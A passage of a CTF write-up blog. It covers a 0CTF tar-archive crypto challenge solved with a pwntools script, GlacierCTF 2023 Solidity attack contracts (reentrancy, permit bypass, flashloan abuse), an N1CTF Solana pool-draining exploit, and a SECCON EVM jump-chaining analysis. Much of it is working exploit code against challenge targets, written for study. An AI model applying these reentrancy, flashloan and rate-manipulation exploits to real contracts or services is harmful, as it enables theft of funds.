    def addflag(self):
        if len(self.data) > MAXNUM:
            self.request.sendall(b"[Error] too many secrets\n")
            raise LicenseRequired
        name = os.urandom(4).hex()
        self.data[name] = 0
        self.savefile(name, flag)

    def handle(self):
        if not self.proof_of_work():
            return
        self.data = {}
        self.dir = tempfile.mkdtemp()
        os.chdir(self.dir)
        signal.alarm(120)
        self.request.sendall(b"*** Welcome to ctar service ***\nUpload and archive your secrets with our super fancy homemade secure tar file format. You'll like it\nNotice: the file size is limited in your free trial\n")
        while True:
            try:
                self.request.sendall(b"1. add your secret\n2. upload ctar file\n3. read secrets\n4. download ctar file\n0. add flag\n> ")
                i = self.recvint()
                if i==1:
                    self.addsec()
                elif i==2:
                    self.upload()
                elif i==3:
                    self.readsec()
                elif i==4:
                    self.download()
                elif i==0:
                    self.addflag()
                else:
                    break
            except:
                pass
        os.system(f"rm -r {self.dir}")
        self.request.close()

class ForkedServer(socketserver.ForkingTCPServer, socketserver.TCPServer):
    pass

if __name__ == "__main__":
    HOST, PORT = '0.0.0.0', 10001
    server = ForkedServer((HOST, PORT), Task)
    server.allow_reuse_address = True
    server.serve_forever()

analysis

We can upload any data as long as its length is less than 100, and then re-download the data encrypted with chacha20.

Since download() returns the encrypted data along with the nonce used in chacha20, we can decrypt the downloaded data by using upload() with the nonce.

Additionally, we can observe the result of the decryption process using one-byte error

After calling addflag(), download() does not provide us with nonce to be used in upload().

This means we cannot decrypt the output of download().

cause

upload()

Since we know the filename of the flag file, if we include the flag_filename in a.tar, it becomes 'self.data=1'.

But, the flag file will be overwritten with the content of a.tar, which is different from the original flag, during decompression.

However, overwriting can be prevented by triggering an error within the extractall() function, as it is enclosed within a try-except statement.

solve

1. addsec()

2. download()

3. addflag()

4. modify the filename in a.tar

5. generate an error by changing the mode and typeflag

6. calculate a checksum for .tar and then modify the checksum field.

7. upload() with that file

8. download() includes the flag

9. upload() to see the decrypt output

An error occurred when the mode was set to 0777 and the type flag was set to 3

from pwn import *
from hashlib import sha256

r = remote("chall.ctf.0ops.sjtu.cn", "30001")


''' POW '''
r.recvuntil(b'XXXX+')
suffix=r.recvuntil(b') == ').decode().split(')')[0]
sha=r.recvline()[:-1].decode()

print(suffix,sha)

alphabet="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
def pow():
    for a1 in alphabet:
        for a2 in alphabet:
            for a3 in alphabet:
                for a4 in alphabet:
                    proof=a1+a2+a3+a4+suffix
                    if(sha256(proof.encode('latin-1')).hexdigest()==sha):
                        print('[+]pow found')
                        r.sendline((a1+a2+a3+a4).encode())
                        return
pow()
''''''


'''addsec()'''
r.sendlineafter("> ", "1")
r.sendlineafter("size: ", "3")
r.sendlineafter("file(hex): ", "aabbcc")
''''''


'''download()'''
r.sendlineafter("> ", "4")

r.recvuntil("ctar file size: ")
siz = r.recvline()[:-1]
dat = r.recvline()[:-1]



'''get a original file using upload()'''
r.sendlineafter("> ", "2")
r.sendlineafter("size: ", siz)
r.sendlineafter("file(hex): ", dat[:16] + b"00" + dat[18:])
r.recvuntil("[Error] not tar file\n")

server_tar = r.recvline()[:-1].decode()
server_tar = "2E" + server_tar[2:]

stream = []
for i in range(len(dat[16:])//2):
    stream.append(int(server_tar[2*i:2*i+2], 16) ^ int(dat[16+2*i:16+2*i+2], 16))



'''addflag()'''
r.sendlineafter("> ", "0")
flagfile_name = r.recvline()[:-1].split(b' ')[1]
assert len(flagfile_name) == 8
''''''



'''modify a.tar'''
data = bytes.fromhex(server_tar)
our_data = data[0x400:0x400+0x1f4]

# filename
our_data = flagfile_name + our_data[8:]
# mode
our_data = our_data[:100] + b"0000777\x00" + our_data[100+8:]
# typeflag
our_data = our_data[:156] + b"3" + our_data[156+1:]
''''''


'''calc checksum'''
chk_data = our_data[:148] + b" " * 8 + our_data[148+8:]
checksum = 0

for i in range(len(our_data)):
    checksum += chk_data[i]

# final
our_data = our_data[:148] + bytes("%06o\0" % checksum, "ascii") + b"\x20" + our_data[148+8:]
attack_tar = data[:0x400] + our_data + data[0x400+0x1f4:]
''''''




'''upload()'''
r.sendlineafter("> ", "2")
r.sendlineafter("size: ", siz)

payload = []
for i in range(len(stream)):
    payload.append(stream[i] ^ attack_tar[i])
r.sendlineafter("file(hex): ", dat[:16] + bytes(payload).hex().encode('latin-1'))



'''download()'''
r.sendlineafter("> ", "4")
r.recvuntil("ctar file size: ")
siz = r.recvline()[:-1]
dat = r.recvline()[:-1]



'''upload()'''
r.sendlineafter("> ", "2")
r.sendlineafter("size: ", siz)
r.sendlineafter("file(hex): ", dat[:16] + b"00" + dat[18:])
r.recvuntil("[Error] not tar file\n")
flag = bytes.fromhex(r.recvline()[:-1].decode())
for i in range(len(flag)):
    if b"flag" == flag[i:i+4]:
        print(flag[i:i+100])
r.interactive()

GlacierCTF 2023 - smartcontract

gss1 — Sun, 26 Nov 2023 22:22:45 +0900

Thank you to the author for making the interesting challenges.

GlacierCoin

pragma solidity ^0.8.18;

import "./Setup.sol";
import "./Challenge.sol";

contract Attack {
    GlacierCoin public challenge = GlacierCoin(0x0EF6D6942F37278bFC2C72152Ef17ec5687dddC8);

    constructor() {
    }

    function attack() public payable {
        challenge.buy{value: 10 ether}();
        challenge.sell(10 ether);
    }

    receive() payable external {
        if(address(challenge).balance != 0) challenge.sell(10 ether);
    }
}

GlacierVault

pragma solidity ^0.8.18;

import "./GlacierVault.sol";
import "./Guardian.sol";

contract Attack {
    address public t = 0x4595E89043b7F236a799356D0CE0A8be2010a5Dd;

    function attack() public payable{
        t.call{value: 1337}(abi.encodeWithSignature("quickStore(uint8,uint256)", 0, uint160(address(this))));
        Guardian(payable(t)).putToSleep();
    }
}

ChairLift

pragma solidity ^0.8.0;

import "./Ticket.sol";
import "./ChairLift.sol";

contract Attack {

    Ticket public ticket = Ticket(0x260fFe2ca289897508422696A8285324DBA91D2B);
    ChairLift public chairLift = ChairLift(0xFC9f5Fb76C297f8E7A6e39Ac2953A59690878173);
    
    function attack () public {
        ticket.transferWithPermit(address(0), address(this), 13, block.timestamp, 28, 0x0, 0x0);
        chairLift.takeRide(13);
    }
}

The Council of Apes

pragma solidity ^0.8.20;

import "./IcyExchange.sol";
import "./CouncilOfApes.sol";
import "./TotallyNotCopiedToken.sol";
import "./ERC20.sol";
import "./IERC20.sol";

contract MyToken is ERC20 {
    constructor() ERC20("name", "symbol") {
        _mint(msg.sender, 100_000_000);
    }
}

contract Attack {
    
    IcyExchange public icyExchange = IcyExchange(0xb29ab9e67f0B7D85922f297f1e38517968481E43);
    CouncilOfApes public council = CouncilOfApes(0x9Ee6Da4758ed65212a72aCCD71B6d223e2610b2E);
    IERC20 public icyToken = IERC20(0x7751a7E59455945ffC9D2d4F19188c07E5Fcf2b7);
    MyToken[] public tokens = new MyToken[](11);

    constructor() payable {}

    uint public cnt = 0;

    function attack() public payable {
        council.becomeAnApe(keccak256("I hereby swear to ape into every shitcoin I see, to never sell, to never surrender, to never give up, to never stop buying, to never stop hodling, to never stop aping, to never stop believing, to never stop dreaming, to never stop hoping, to never stop loving, to never stop living, to never stop breathing"));

        for(uint i = 0; i < 11; i++) {
            tokens[i] = new MyToken();
            tokens[i].approve(address(icyExchange), type(uint256).max);
            tokens[i].approve(address(council), type(uint256).max);

            icyExchange.createPool{value: 1 ether}(address(tokens[i]));
        }
    
        icyToken.approve(address(icyExchange), type(uint256).max);

        cnt++;
        icyExchange.collateralizedFlashloan(address(tokens[cnt-1]), 100_000_000 - 100_000, address(this));
    }

    function receiveFlashLoan(uint256 amount) public {
        cnt++;
        if (cnt <= 11) {
            icyExchange.collateralizedFlashloan(address(tokens[cnt-1]), 100_000_000 - 100_000, address(this));
        }
        else {
            icyToken.approve(address(council), type(uint256).max);
            council.buyBanana(1_000_000_000);
            council.vote(address(this), 1_000_000_000);
            council.claimNewRank();
            council.issueBanana(1_000_000_000, address(this));
            council.sellBanana(1_000_000_000);
            council.dissolveCouncilOfTheApes(keccak256("Kevin come out of the basement, dinner is ready."));
        }
    }
}

N1CTF 2023 - blockchain(pool by sec3)

gss1 — Mon, 23 Oct 2023 13:01:57 +0900

I decided to cool off my head during the midterm exam period by trying out the blockchain challenge in N1CTF.

https://github.com/kangsangsoo/CTF-Writeups/tree/main/N1CTF%202023/pool%20by%20sec3

pool by sec3

analysis

I expected a vulnerability by the absence of validation since this code was written in native, not anchor.

but I was surprised to find it solid.

This code is just the implementation of a staking pool.

So our accessible strategy is to deposit SOL and then withdraw the token with the aim of receiving more SOL.

// Fund the deposit record account
let lamports_required_for_deposit_record = (Rent::get()?).minimum_balance(DepositRecord::LEN);
msg!(format!("lamports_required_for_deposit_record: {}", lamports_required_for_deposit_record).as_str()); // added for debug
**pool_account.lamports.borrow_mut() -= lamports_required_for_deposit_record; 
**deposit_record_account.lamports.borrow_mut() += lamports_required_for_deposit_record;

What's notable is that the program records our data on-chain and that itself covers the rent cost by using pool balance.

if deposit_record_data.lp_token_amount == 0 {
        // close deposit record account
    **pool_account.lamports.borrow_mut() += deposit_record_account.lamports();
    **deposit_record_account.lamports.borrow_mut() = 0;
    deposit_record_account.realloc(0, true)?;
    deposit_record_account.assign(system_program.key);
}

Also, if the record is no longer needed, the remaining amount is returned to the pool.

impl DepositRecord {
    pub const SEED_PREFIX: &'static str = "RECOOORD";
    pub const LEN: usize = 0x2000; // I'm too lazy to calculate this
}

However, because the struct size is quite large, I could guess a significant cost is incurred.

I checked the logs from the server and revealed that about 0.05 SOL was paid.

As this amount is deducted from the pool account, it ultimately impacts the LP:token exchange rate.

- scenario

1. Create many DepositRecords in order to make pool balance 0.000000001SOL.

2. Deposit all our balance(0.9SOL) to the pool.

3. Remove all DepositRecords made in 1-step.

4. FInally, withdraw our all tokens made in 2-step.

solve

added in main.rs

    // added
    writeln!(stream, "m {}", "28prS7e14Fsm97GE5ws2YpjxseFNkiA33tB5D3hLZv3t")?;
    for i in 0..20 {
        let (deposit_record_account_pda, _) = Pubkey::find_program_address(&[chall::state::DepositRecord::SEED_PREFIX.as_bytes(), pool.as_ref(), user.as_ref(), [i].to_vec().as_ref()], &chall_id);
        writeln!(stream, "mw {}", deposit_record_account_pda)?;
    }

processor.rs

use borsh::{BorshSerialize, BorshDeserialize};

use solana_program::{
    account_info::{
        next_account_info,
        AccountInfo,
    },
    entrypoint::ProgramResult,
    instruction::{
        AccountMeta,
        Instruction,
    },
    program::invoke,
    pubkey::Pubkey, log,
};

pub fn process_instruction(_program: &Pubkey, accounts: &[AccountInfo], _data: &[u8]) -> ProgramResult {
    let accounts_iter = &mut accounts.iter();
    let admin = next_account_info(accounts_iter)?;
    let user = next_account_info(accounts_iter)?;
    let user_token_account = next_account_info(accounts_iter)?;
    let pool = next_account_info(accounts_iter)?;
    let mint = next_account_info(accounts_iter)?;
    let chall_id = next_account_info(accounts_iter)?;
    let rent = next_account_info(accounts_iter)?;
    let token_program = next_account_info(accounts_iter)?;
    let associated_token_program = next_account_info(accounts_iter)?;
    let system_program = next_account_info(accounts_iter)?;
    let solve_program = next_account_info(accounts_iter)?;

    let mut records  = vec![];

    for i in 0..17 {
        records.push(next_account_info(accounts_iter)?);
    }

    if (**pool.lamports.borrow() > 800_000_000) && (**user.lamports.borrow() > 800_000_000) {
        for i in 0..11 {
            let record_1 = records[i];
            let fisrt = Instruction::new_with_bytes(
                chall_id.key.clone(),
                &chall::processor::PoolInstruction::Deposit(100, [i as u8].to_vec()).try_to_vec().unwrap(),
                vec![
                    AccountMeta::new(pool.key.clone(), false),
                    AccountMeta::new(record_1.key.clone(), false),
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new(user_token_account.key.clone(), false),
                    AccountMeta::new(mint.key.clone(), false),
                    AccountMeta::new_readonly(token_program.key.clone(), false),
                    AccountMeta::new_readonly(associated_token_program.key.clone(), false),
                    AccountMeta::new_readonly(system_program.key.clone(), false),
                ],
            );
        
            invoke(&fisrt, 
                &[
                    pool.clone(),
                    user.clone(),
                    rent.clone(),
                    record_1.clone(),
                    user_token_account.clone(),
                    mint.clone(),
                    token_program.clone(),
                    system_program.clone(),
                    chall_id.clone(),
                    associated_token_program.clone(),
            ]);
        }
    }  else if (**pool.lamports.borrow() > 100_000_000) && (**user.lamports.borrow() > 800_000_000) {
         {
            for i in 11..13 {
                let record_1 = records[i];
                let fisrt = Instruction::new_with_bytes(
                    chall_id.key.clone(),
                    &chall::processor::PoolInstruction::Deposit(100, [i as u8].to_vec()).try_to_vec().unwrap(),
                    vec![
                        AccountMeta::new(pool.key.clone(), false),
                        AccountMeta::new(record_1.key.clone(), false),
                        AccountMeta::new(user.key.clone(), true),
                        AccountMeta::new(user_token_account.key.clone(), false),
                        AccountMeta::new(mint.key.clone(), false),
                        AccountMeta::new_readonly(token_program.key.clone(), false),
                        AccountMeta::new_readonly(associated_token_program.key.clone(), false),
                        AccountMeta::new_readonly(system_program.key.clone(), false),
                    ],
                );
            
                invoke(&fisrt, 
                    &[
                        pool.clone(),
                        user.clone(),
                        rent.clone(),
                        record_1.clone(),
                        user_token_account.clone(),
                        mint.clone(),
                        token_program.clone(),
                        system_program.clone(),
                        chall_id.clone(),
                        associated_token_program.clone(),
                ]);
            }
            let record_1 = records[13];
            let fisrt = Instruction::new_with_bytes(
                chall_id.key.clone(),
                &chall::processor::PoolInstruction::Deposit(34_000_000 - 2_089_587, [13 as u8].to_vec()).try_to_vec().unwrap(), // 9588
                vec![
                    AccountMeta::new(pool.key.clone(), false),
                    AccountMeta::new(record_1.key.clone(), false),
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new(user_token_account.key.clone(), false),
                    AccountMeta::new(mint.key.clone(), false),
                    AccountMeta::new_readonly(token_program.key.clone(), false),
                    AccountMeta::new_readonly(associated_token_program.key.clone(), false),
                    AccountMeta::new_readonly(system_program.key.clone(), false),
                ],
            );
        
            invoke(&fisrt, 
                &[
                    pool.clone(),
                    user.clone(),
                    rent.clone(),
                    record_1.clone(),
                    user_token_account.clone(),
                    mint.clone(),
                    token_program.clone(),
                    system_program.clone(),
                    chall_id.clone(),
                    associated_token_program.clone(),
            ]);

            let record_1 = records[14];
            let fisrt = Instruction::new_with_bytes(
                chall_id.key.clone(),
                &chall::processor::PoolInstruction::Deposit(100, [14 as u8].to_vec()).try_to_vec().unwrap(),
                vec![
                    AccountMeta::new(pool.key.clone(), false),
                    AccountMeta::new(record_1.key.clone(), false),
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new(user_token_account.key.clone(), false),
                    AccountMeta::new(mint.key.clone(), false),
                    AccountMeta::new_readonly(token_program.key.clone(), false),
                    AccountMeta::new_readonly(associated_token_program.key.clone(), false),
                    AccountMeta::new_readonly(system_program.key.clone(), false),
                ],
            );
        
            invoke(&fisrt, 
                &[
                    pool.clone(),
                    user.clone(),
                    rent.clone(),
                    record_1.clone(),
                    user_token_account.clone(),
                    mint.clone(),
                    token_program.clone(),
                    system_program.clone(),
                    chall_id.clone(),
                    associated_token_program.clone(),
            ]);

            let record_1 = records[14];
            let fisrt = Instruction::new_with_bytes(
                chall_id.key.clone(),
                &chall::processor::PoolInstruction::Deposit(950_000_000, [14 as u8].to_vec()).try_to_vec().unwrap(),
                vec![
                    AccountMeta::new(pool.key.clone(), false),
                    AccountMeta::new(record_1.key.clone(), false),
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new(user_token_account.key.clone(), false),
                    AccountMeta::new(mint.key.clone(), false),
                    AccountMeta::new_readonly(token_program.key.clone(), false),
                    AccountMeta::new_readonly(associated_token_program.key.clone(), false),
                    AccountMeta::new_readonly(system_program.key.clone(), false),
                ],
            );
        
            invoke(&fisrt, 
                &[
                    pool.clone(),
                    user.clone(),
                    rent.clone(),
                    record_1.clone(),
                    user_token_account.clone(),
                    mint.clone(),
                    token_program.clone(),
                    system_program.clone(),
                    chall_id.clone(),
                    associated_token_program.clone(),
            ]);

            for i in 0..6 {
                let record_1 = records[i];
                let amt = chall::state::DepositRecord::try_from_slice(&record_1.data.borrow())?.lp_token_amount;
    
                let fisrt = Instruction::new_with_bytes(
                    chall_id.key.clone(),
                    &chall::processor::PoolInstruction::Withdraw(amt, [i as u8].to_vec()).try_to_vec().unwrap(),
                    vec![
                        AccountMeta::new(pool.key.clone(), false),
                        AccountMeta::new(record_1.key.clone(), false),
                        AccountMeta::new(user.key.clone(), true),
                        AccountMeta::new(user_token_account.key.clone(), false),
                        AccountMeta::new(mint.key.clone(), false),
                        AccountMeta::new_readonly(token_program.key.clone(), false),
                        AccountMeta::new_readonly(associated_token_program.key.clone(), false),
                        AccountMeta::new_readonly(system_program.key.clone(), false),
                    ],
                );

                invoke(&fisrt, 
                    &[
                        pool.clone(),
                        user.clone(),
                        rent.clone(),
                        record_1.clone(),
                        user_token_account.clone(),
                        mint.clone(),
                        token_program.clone(),
                        system_program.clone(),
                        chall_id.clone(),
                        associated_token_program.clone(),
                ]);
            }
        }


    } else {
        for i in 6..15 {
            let record_1 = records[i];
            let amt = chall::state::DepositRecord::try_from_slice(&record_1.data.borrow())?.lp_token_amount;


            let fisrt = Instruction::new_with_bytes(
                chall_id.key.clone(),
                &chall::processor::PoolInstruction::Withdraw(amt, [i as u8].to_vec()).try_to_vec().unwrap(),
                vec![
                    AccountMeta::new(pool.key.clone(), false),
                    AccountMeta::new(record_1.key.clone(), false),
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new(user_token_account.key.clone(), false),
                    AccountMeta::new(mint.key.clone(), false),
                    AccountMeta::new_readonly(token_program.key.clone(), false),
                    AccountMeta::new_readonly(associated_token_program.key.clone(), false),
                    AccountMeta::new_readonly(system_program.key.clone(), false),
                ],
            );
        
            invoke(&fisrt, 
                &[
                    pool.clone(),
                    user.clone(),
                    rent.clone(),
                    record_1.clone(),
                    user_token_account.clone(),
                    mint.clone(),
                    token_program.clone(),
                    system_program.clone(),
                    chall_id.clone(),
                    associated_token_program.clone(),
            ]);
        }
    }

    Ok(())
}

SECCON CTF 2023 Quals - [misc, blockchain](tokyo payload)

gss1 — Fri, 22 Sep 2023 18:09:15 +0900

https://github.com/minaminao/tokyo-payload

"minaminao" made a very interesting and hard blockchain challenge of which length is short in SECCON CTF 2023 Quals.

I felt like solving pwnable because I had to chain the payload like ROP.

I wasted a lot of time and effort during/after the competition and the reason was very trivial.

That was the difference of bytecode between my local and the server environment.

I used Remix IDE which provides CLI and has a default compiler option of "no optimize, --evm-version shanghai".

However, "forge build" of the server environment has "--optimize" and "--evm-version paris".

Remix IDE

TokyoPayload.json (forge build)

I rewrote my payload four times until I found out this and recognized that the bytecode was different after seeing the excessive transaction gas usage.

author's comment

I think everyone who solves this problem has a different payload.

My payload is complicated and long, so I recommend you look at other payloads.

Background

Through this challenge, I learned so much interesting something about EVM and Solidity.

Let's assume that optimization is not applied.

EVM is a state machine using Stack, Memory, PC, etc.

When we call a function, we pass function arguments and return value through the stack and memory.

https://www.evm.codes/?fork=shanghai

Calling a function within the contract means that we move Program Counter to staring point of the corresponding function opcode via JUMP.

Only JUMPDEST is allowed as the destination of JUMP, otherwise it reverts.

We can find the destnation index through deployed bytecode.

The caller should push JUMPDEST to return, JUMPDEST to go, and arguments to the stack.

The callee should clean the space they used. e.g. If they received some arguments from the caller, they should pop them.

without argument

function fun1() public {
    fun2();
}

function fun2() public {
}

tag 4			function fun1() public {\r\n  ...
  JUMPDEST 			function fun1() public {\r\n  ...
  PUSH [tag] 7			function fun1() public {\r\n  ...
  PUSH [tag] 8			function fun1() public {\r\n  ...
  JUMP 			function fun1() public {\r\n  ...
tag 7			function fun1() public {\r\n  ...
  JUMPDEST 			function fun1() public {\r\n  ...
  STOP 			function fun1() public {\r\n  ...
tag 8			function fun1() public {\r\n  ...
  JUMPDEST 			function fun2() public {\r\n  ...
  JUMP

PC => JUMP

stack[0] = destination addr

stack[1] = return addr

...

with arguments

function fun1() public {
    fun2(0x8, 0x9);
}

function fun2(uint a, uint b) public {
}

tag 6			function fun1() public {\r\n  ...
  JUMPDEST 			function fun1() public {\r\n  ...
  PUSH [tag] 12			fun2(0x8, 0x9)
  PUSH 8			0x8
  PUSH 9			0x9
  PUSH [tag] 10			fun2
  JUMP 			fun2(0x8, 0x9)
tag 12			fun2(0x8, 0x9)
  JUMPDEST 			fun2(0x8, 0x9)
  JUMP 			function fun1() public {\r\n  ...
tag 10			function fun2(uint a, uint b) ...
  JUMPDEST 			function fun2(uint a, uint b) ...
  POP 			function fun2(uint a, uint b) ...
  POP 			function fun2(uint a, uint b) ...
  JUMP 			function fun2(uint a, uint b) ...

PC => JUMP

stack[0] = destination addr

stack[1] = arg0

stack[2] = arg1

stack[3] = return addr

...

without return

function fun1() public {
    fun2();
}

function fun2() public {
}

tag 4			function fun1() public {\r\n  ...
  JUMPDEST 			function fun1() public {\r\n  ...
  PUSH [tag] 7			function fun1() public {\r\n  ...
  PUSH [tag] 8			function fun1() public {\r\n  ...
  JUMP 			function fun1() public {\r\n  ...
tag 7			function fun1() public {\r\n  ...
  JUMPDEST 			function fun1() public {\r\n  ...
  STOP 			function fun1() public {\r\n  ...
tag 6			function fun2() public {\r\n  ...
  JUMPDEST 			function fun2() public {\r\n  ...
  JUMP 			function fun2() public {\r\n  ...
tag 8			function fun1() public {\r\n  ...
  JUMPDEST 			function fun1() public {\r\n  ...
  PUSH [tag] 11			fun2()
  PUSH [tag] 6			fun2
  JUMP 			fun2()
tag 11			fun2()
  JUMPDEST 			fun2()
  JUMP 			function fun1() public {\r\n  ...

PC = JUMP

stack[0] = ret addr

...

with return

function fun1() public {
    fun2();
}

function fun2() public returns(uint, uint) {
    return (0x8, 0x9)
}

tag 4			function fun1() public {\r\n  ...
  JUMPDEST 			function fun1() public {\r\n  ...
  PUSH [tag] 9			function fun1() public {\r\n  ...
  PUSH [tag] 10			function fun1() public {\r\n  ...
  JUMP 			function fun1() public {\r\n  ...
tag 9			function fun1() public {\r\n  ...
  JUMPDEST 			function fun1() public {\r\n  ...
  STOP 			function fun1() public {\r\n  ...
tag 6			function fun2() public returns...
  JUMPDEST 			function fun2() public returns...
  PUSH 0			uint
  DUP1 			uint
  PUSH 8			0x8
  PUSH 9			0x9
  SWAP2 			return (0x8, 0x9)
  POP 			return (0x8, 0x9)
  SWAP2 			return (0x8, 0x9)
  POP 			return (0x8, 0x9)
  SWAP1 			function fun2() public returns...
  SWAP2 			function fun2() public returns...
  JUMP 			function fun2() public returns...
tag 10			function fun1() public {\r\n  ...
  JUMPDEST 			function fun1() public {\r\n  ...
  PUSH [tag] 13			fun2()
  PUSH [tag] 6			fun2
  JUMP 			fun2()
tag 13			fun2()
  JUMPDEST 			fun2()
  POP 			fun2()
  POP 			fun2()
  JUMP 			function fun1() public {\r\n  ...

PC = JUMP

stack[0] = ret addr

stack[1] = ret1

stack[2] = ret0

...

+ if the caller does not receive return values, they will be popped.

array layout

storage

dynamic array:

storage[slot] = length

arr[i] = sha3(i, slot)

fixed array:

arr[i] = slot + i

memory

dynamic array:

mem[ptr] = length

arr[i] = ptr + 1 + i

fixed array

arr[i] = ptr + i

memory layout

https://docs.soliditylang.org/en/latest/internals/layout_in_memory.html

[0x00: 0x40]: scratch space

[0x40: 0x60]: currently allocated memory size

[0x60: 0x80]: zero slot

The zero slot is used as initial value for dynamic memory arrays and should never be written to (the free memory pointer points to 0x80 initially).

tokyoPayload():: function()[] memory funcs;

resetGasLimit():: uint256[] memory arr;

Since dynamic memory arrays are used without allocation, zero-slot(0x60) represents them.

Analysis

A user must set solved as true, but it seems that there is no functionality to change slot 0 inside TokyoPayload.

We can easily come up with the idea of calling a logic contract that turns slot 0 into true through delegatecall().

Unfortunately, delegatecall() has two constraints, one of which is checking for msg.sender and the other is gas option.

It is natural that we cannot find the private key whose public key is 0xCAFE.

So we need a method of bypass for require statement.

Assuming we bypass require statement, we need to increase gasLimit by at least 20000 because sstore opcode consumes 20000 gas.

As the name of resetGasLimit() shows, it resets gasLimit.
In resetGasLimit(), uint256[] memory arr is declared as a dynamic array but it is not allocated, resulting arr.length is zero

As I mentioned above, not-allocated dynamic array is represented by zero slot that occupies memory [0x60:0x80).

If we change zero slot, we can control gasLimit.

tokyoPayload() provides a user with the chance to overwrite memory using calldatacopy.

If we call resetGasLimit() continuously before tokyoPayload() finishes its procedure, the memory is retained.

Additionally, it has a function pointer array and calls one of those, allowing us to chain calling function!!

We are aware that calling functions is equal to jumping to JUMPDEST within the deployed bytecode.

In the solidity code, if-else, require statement, calling functions create a branch, meaning that the code that is not the entry point of the function can be JUMPDEST.

For example, delegatecall() opcode follows as:

We can easily bypass require statement through tag 50.

To summarize, we must

1. control memory[0x60:0x80) using calldatacopy

2. bypass the require statement using JUMP

the calldata of tokyoPayload() consists of

function signature=hex'000040c3'(4-byte) + x(32-byte) + y(32-byte) + additonal data(length we want)

Maybe everyone's solution is different from here.

I chose x as 0x7b, which makes memory[0x60:0x80) = 0x40c300.

Then 0x40c300 && 0xffff = 0xc300 is more than 20000, gas is enough to use sstore opcode.

At this point, we note that the range of x should be [0x40: 0x79].

Before funcs[z]() is called, array boundary check exists.

Since funcs is not allocated, it compares the value stored at zero slot with the index called.

PUSH 60			function()[] memory funcs
PUSH 0			uint256 z
DUP3 			y
SWAP1 			uint256 z = y
POP 			uint256 z = y
PUSH [tag] 43			funcs[z]()
DUP3 			funcs
DUP3 			z
DUP2 			funcs[z]
MLOAD 			funcs[z]
DUP2 			funcs[z]
LT 			funcs[z]

By the way, we don't need to care about that because zero slot has 0xc300.

Which JUMPDEST should we choose?

1. tokyoPayload(x, y)

2. load(i)

3. createArray(length)

4. resetGasLimit()

5. delegatecall(addr)

When we encounter JUMP opcode, stack follows as:

stack[0] => next JUMPDEST

stack[1] => ret addr => finish this call of tokyoPayload()

stack[2] => z

stack[3] => funcs zero slot: 0x60

stack[4] => y

stack[5] => x

stack[6] => 0x97 => stop opcode

stack[7] => tokyoPayload function signature

As we learned above Background, the function's arguments are passed through stack.

If next function has

1. no argument

there is no change due to the type of funcs

stack[0] => next JUMPDEST

stack[1] => ret addr

stack[2] => z

stack[3] => funcs zero slot: 0x60

stack[4] => y

stack[5] => x

stack[6] => 0x97 => stop opcode

stack[7] => tokyoPayload function signature

2. one argument

stack[0] => next JUMPDEST

stack[1] => ret addr => next function's argument

stack[2] => z => ret addr

stack[3] => funcs zero slot: 0x60

stack[4] => y

stack[5] => x

stack[6] => 0x97 => stop opcode

stack[7] => tokyoPayload function signature

3. two arguments

stack[0] => next JUMPDEST

stack[1] => ret addr => next function's second argument

stack[2] => z => next function's first argument

stack[3] => funcs zero slot: 0x60 => ret addr

stack[4] => y

stack[5] => x

stack[6] => 0x97 => stop opcode

stack[7] => tokyoPayload function signature

In order to control execution flow, I must choose one argument case.

As a result, we will call sequentially tokyoPayload() -> funcs[z]() -> z().

stack[0] => next JUMPDEST => first call

stack[1] => ret addr => first function's argument

stack[2] => z => first ret addr => second call

stack[3] => funcs zero slot: 0x60

stack[4] => y

stack[5] => x

stack[6] => 0x97 => stop opcode

stack[7] => tokyoPayload function signature

It would be better to look at load() for pushing some values we want to the stack.

Having three return values is identical to pushing three values into the stack.

if the first call is load()

step i)

stack[0] => next JUMPDEST => first call => load()

stack[1] => ret addr => first call's argument => i

stack[2] => z => first ret addr => second call

stack[3] => funcs zero slot: 0x60

stack[4] => y

stack[5] => x

stack[6] => 0x97 => stop opcode

stack[7] => tokyoPayload function signature

step ii)

stack[0] => z => first ret addr => second call

stack[1] => c => third return value => second call's argument

stack[2] => b => second return value => third call

stack[3] => a => first return value

stack[4] => funcs zero slot: 0x60

stack[5] => y

stack[6] => x

stack[7] => 0x97 => stop opcode

stack[8] => tokyoPayload function signature

Test.sol

https://gist.github.com/kangsangsoo/fdbdb2815ffa6288e513ad4edd3b4278

payload.py

https://gist.github.com/kangsangsoo/d93036176b74d0e6898c0d3c3ca8ea29

Remix setting(important)

remix debugger

I noted that load(i)'s third return value remains, allowing me to use it as any function argument.

So my idea is that I repeat this and then chain those like load() -> load() -> ... -> func1 -> func2 -> func3 => solved!!

Actually, func1, func2, and func3 are determined above.

func1 => resetGasLimit()

func2 => delegatecall(addr)

We will set load()'s third value in detail. Now we just set a value for easy identification in the debugger.

Due to optimize option, we have to take a look at resetGasLimit() opcodes.

resetGasLimit() could be called from two places:

i. just call resetGasLimit()

ii. inside tokyoPayload()

They have different opcodes at the end.

i) case cannot be used in our payload because it has a STOP opcode.

tag 5			function resetGasLimit() publi...
    JUMPDEST 			function resetGasLimit() publi...
    PUSH [tag] 11			function resetGasLimit() publi...
    PUSH 60			uint256[] memory arr
    MLOAD 			arr.length
    PUSH 1			gasLimit
    SSTORE 			gasLimit = arr.length
    JUMP 			function resetGasLimit() publi...
tag 11			function tokyoPayload(uint256 ...
    JUMPDEST 			function tokyoPayload(uint256 ...
    STOP 			function tokyoPayload(uint256 ...

We have no choice but to go to ii).

As we know, tokyoPayload() would make the stack:

stack[0] => next JUMPDEST

stack[1] => ret addr => finish this call of tokyoPayload()

stack[2] => z

stack[3] => funcs zero slot: 0x60

stack[4] => y

stack[5] => x

...

some value I pushed

...

stack[?] => 0x97 => stop opcode

stack[?] => tokyoPayload function signature

That means scenario ii) spoils stack[0:5] to be used for chaining.

As we think of ROP, pop-pop-pop-pop-ret gadget also exists in deployed bytecode?

The answer is yes.

tag 43			funcs[z]()
    JUMPDEST 			funcs[z]()
    POP 			{\n        require(x >= 0x40);...
    POP 			{\n        require(x >= 0x40);...
    POP 			function tokyoPayload(uint256 ...
    POP 			function tokyoPayload(uint256 ...
    JUMP 			function tokyoPayload(uint256 ...

Thanks to pop4-ret gadget

stack[0] => next JUMPDEST => p4-ret gadget

stack[1] => ret addr => will be popped

stack[2] => z => will be popped

